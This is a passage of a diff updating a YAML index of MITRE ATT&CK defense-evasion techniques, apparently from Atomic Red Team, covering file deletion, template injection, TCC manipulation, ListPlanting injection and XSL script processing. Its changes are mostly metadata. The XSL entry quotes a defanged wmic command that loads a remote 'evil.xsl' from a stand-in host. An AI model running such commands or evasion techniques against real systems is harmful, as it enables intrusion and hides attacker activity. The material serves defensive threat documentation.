-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12363,18 +12664,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12436,7 +12755,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12466,13 +12785,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12569,7 +12886,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12632,7 +12948,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12670,7 +12985,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12697,8 +13012,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12726,7 +13039,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12770,8 +13083,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12826,7 +13137,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12846,7 +13157,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -12896,7 +13206,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -12951,12 +13260,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13006,12 +13314,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13071,8 +13378,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13089,37 +13396,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13127,6 +13415,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13134,7 +13424,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13164,7 +13454,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13210,7 +13499,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13255,8 +13544,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13301,7 +13588,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13315,58 +13602,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13383,6 +13640,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13397,21 +13657,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13456,9 +13747,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13515,8 +13805,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13525,57 +13815,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13593,29 +13837,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
